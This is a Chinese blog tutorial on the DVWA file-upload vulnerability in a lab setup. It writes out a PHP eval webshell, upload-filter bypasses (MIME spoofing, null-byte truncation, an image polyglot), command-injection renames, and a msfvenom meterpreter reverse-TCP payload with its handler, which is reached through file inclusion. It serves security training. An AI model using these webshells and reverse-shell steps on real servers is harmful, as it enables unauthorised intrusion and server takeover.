dvwa中的文件上传漏洞

已于 2023-01-17 09:17:22 修改
阅读量9.8k 收藏 173
点赞数 23
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: web安全 dvwa 文件上传漏洞
于 2023-01-12 14:28:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leiwuhen92/article/details/128659049

环境:

Metasploitable2: 192.168.11.157 dvwa版本:Version 1.0.7 (Release date: 08/09/10)

kail机器:192.168.11.156

一、什么是文件上传漏洞?

  1. 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等。正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回;

  1. 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网;

上传漏洞原理图:

文件上传漏洞,通常是由于对上传文件的类型、内容没进行严格的审查、过滤,使得攻击者可以通过上传木马获取服务器的webshell权限。

入侵条件:

  1. 木马上传成功

  1. 知道木马的路径

  1. 木马能够正常运行

二、演示dvwa上的文件上传漏洞

2.1、编辑一句话木马

pass.php文件添加 

<?php @eval($_POST['pass']);?>

  • @表示后面即使执行错误,也不报错。

  • eval()函数表示括号内的语句字符串什么的全都当做代码执行。

  • $_POST['pass']表示从页面中获得pass这个参数值。

2.2、低安全模式

low级别未对上传的文件进行任何验证,可以上传任意类型的文件

尝试上传木马文件php文件,成功:

直接打开木马文件http://192.168.11.157/dvwa/hackable/uploads/pass.php访问成功,但没有显示任何内容(因为是php文件)

通过中国蚁剑连接工具(或者中国菜刀)将url添加进去,密码为pass

打开文件管理,进入后台成功:

2.3、中安全模式

限制文件类型image/jpeg和大小不能超过100000B(约为97.6KB)

2.3.1、可以利用burpsuite绕过

上传木马文件pass.php,更改文件类型为image/jpeg

攻击后发现上传成功:

2.3.2、00截断

将木马文件pass.php改名为pass.php.jpeg,上传pass.php.jpeg,同时开启burpsuite捕获

切换到Hex进制,将pass.php.jpeg截断为pass.php:

点击“forward”, 也可将pass.php成功上传:

2.4、高安全模式

文件后缀限制与大小限制

下面介绍几种绕过的方法。

2.4.1、将木马隐藏在图片中绕过(High文件上传+Low命令注入)

1、将木马文件pass.php与图片文件test.jpg合并为php.jpg

windows上(关闭实时防护)使用copy命令: copy test.jpg/b+pass.php/a php.jpg

linux上:cat pass.php >> test.jpg

可以看到,一句话木马被添加到图片的尾部(记事本查看或者cat php.jpg):

2、将php.jpg文件上传,成功:

3、选择命令注入(Command Execution):

调整dvwa的等级为low,在Command Execution中输入 127.0.0.1|ls ../../hackable/uploads

结果如下:

4、然后通过命令注入方式输入以下命令来进行更改文件后缀

127.0.0.1|mv ../../hackable/uploads/php.jpg ../../hackable/uploads/php.php

再执行127.0.0.1|ls ../../hackable/uploads查看:

5、中国蚁剑查看,指定连接目录http://192.168.11.157/dvwa/hackable/uploads/php.php,参数为cmd,类型为PHP(eval):

2.4.2、用msfvenom生成的php代码的图片木马,图片欺诈头部绕过(High文件上传+Low文件包含)

1、首先用msfvenom生成一个PHP语言的IPG图片木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.156 lport=3333 >> /root/Desktop/any.jpg

2、上传图片木马any.png

3、在kali终端输入msfconsole进入控制台,输入如下指令

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.11.156
set lport 3333
run

4、dvwa选择low等级,切换到文件包含File Inclusion

5、在地址栏输入以下的地址并回车

http://192.168.11.157/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/any.jpg

6、msfconsole控制台就有生成一条会话

7、然后我们通过命令查看一下/hackable/uploads这个目录下有什么文件,然后测试随便删除一个文件,看看有没有权限,测试成功

三、参考

DVWA1.9之文件上传漏洞High级多种方法_晚安這個未知的世界的博客-优快云博客_dvwa文件上传high级别

VMware之kali安装中国蚁剑_小豆饼的博客-优快云博客_kali安装中国蚁剑

DVWA文件上传漏洞
sunshine1_0的博客
01-20 2071
文件上传漏洞 低级别 中等级别 高级别
DVWA文件上传漏洞之High渗透测试
Xlucas的博客
08-11 769
DVWA文件上传漏洞之High的渗透测试
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4675
DVWA文件上传
DVWA保姆级通关教程--05文件上传
最新发布
m0_74020575的博客
05-08 1425
文件上传漏洞Web安全中一种常见的漏洞,其本质是攻击者通过上传恶意文件(如脚本文件、木马、WebShell等)到服务器,绕过服务器的安全检测并被执行,最终实现远程命令执行、控制服务器或窃取数据等恶意操作。提示:以下是本篇文章正文内容,下面案例可供参考。
dvwa文件上传漏洞】--文件上传漏洞总结
m0_63241485的博客
08-30 4306
文件上传漏洞--dvwa
DVWA 文件上传漏洞
QYbkx974的博客
11-16 1540
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞
dvwa文件上传漏洞防御
07-13
中的文件上传漏洞防御通常涉及以下几个方面: 1. **验证用户输入**:服务器需要检查上传文件的类型、大小、名称等是否符合预设规则,防止恶意文件上传如PHP脚本、SQL注入文件等。 2. **限制上传路径**:限制用户...
DVWA-文件上传漏洞代码审计(Medium、High)
oyqsb的博客
06-12 650
需要利用文件包含漏洞来执行php脚本,将上传的图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。若服务端脚本语言未对上传的文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)将一张普通图片和php脚本copy出一个包含木马的图片。打开蚁剑添加url和密码。:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名。:将上传的文件移动到新位置,这里表示移动到指定目录。
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 635
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 4314
DVWA靶场漏洞复现之文件上传+文件包含。
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 2300
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
Dvwa文件上传漏洞
JBlock的博客
11-16 4256
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
DVWA文件上传漏洞
极光时流
03-31 721
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1246
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA-File Upload/文件上传漏洞
jammny
11-22 1337
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
DVWA文件上传漏洞
m0_61851859的博客
02-05 471
(1)通过$_FILES预定义变量获取上传文件的文件名(name)、文件类型(type)和文件大小(size)这是三个数据分别赋给三个变量$uploaded_name、$uploaded_type、$uploaded_size。(3)因此,medium级别主要是判断文件的类别和大小,代码中对于文件大小的限制一般文件都可以满足要求,因此主要分析文件上传的类型。(8)综上,low级别对上传的文件类型没有任何防范,其初衷是想要用户只能上传图片,而现在可以上传php文件,而且能够被网站解析。
DVWA靶场通过——文件上传漏洞
sucker的博客
11-27 2141
文件上传漏洞发生在Web应用程序允许用户通过表单上传文件时,如果文件上传机制没有进行严格的验证和限制,攻击者可以上传恶意文件。通过严格的规则来控制上传的文件类型,允许的扩展名可以是特定的静态文件类型(如 .jpg、.png、.txt 等),而拒绝其他动态文件类型(如 .php、.asp、.jsp 等)。1,high难度下对文件上传的限制与过滤更加严格,还是挂上burp suite的proxy,一句话木马文件命名为1.png,上传木马文件并在burp suite截获文件。确保上传的文件类型是预期的类型。
dvwa文件包含漏洞一句话木马
01-02
### DVWA 中的一句话木马利用方法 在DVWA环境中,文件包含漏洞可以被攻击者用来执行恶意代码。当涉及到一句话木马时,通常是指一段非常简洁的PHP代码,它能够接收来自远程客户端的指令并执行相应的命令。 对于DVWA中的文件上传功能,如果存在安全漏洞,则允许攻击者上传特制文件(如带有隐藏PHP代码的图像),并通过访问该文件来触发服务器端执行恶意脚本[^1]。 #### 利用过程 为了成功利用此漏洞: - 攻击者会准备一个看似正常的图片文件,在其中嵌入了一行简单的PHP代码作为webshell。 ```php <?php @eval($_POST['cmd']);?> ``` - 使用Burp Suite这样的工具拦截HTTP请求,并修改MIME类型或其他参数以绕过某些基本的安全检测机制[^4]。 - 成功上传后,通过浏览器或者其他方式向这个已上传到服务器上的特殊文件发送特定格式的数据包,从而实现远程控制目标主机的目的。 然而需要注意的是,在实际测试过程中可能会遇到各种原因导致上述操作无法顺利完成,比如因为fwrite函数后面指针名称错误等问题而使得整个流程失败[^3]。 ### 防护措施建议 针对此类风险,可以从以下几个方面加强系统的安全性: - **输入验证**:严格检查所有用户提交的内容,特别是文件上传部分,确保只接受预期类型的文件,并对文件头进行校验防止伪装成其他形式的可执行代码混入系统内部。 - **权限管理**:合理设置Web应用程序及其工作目录下的读写权限,避免不必要的开放;同时也要注意操作系统层面的安全策略调整,减少潜在威胁面。 - **禁用危险函数**:可以在`php.ini`配置文件中关闭一些容易引发安全隐患的功能调用,像这里的`eval()`就是一个典型例子[^2]。 - **定期更新补丁**:保持所使用的软件版本处于最新状态,及时安装官方发布的修复程序,以此封堵可能存在的未知漏洞
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值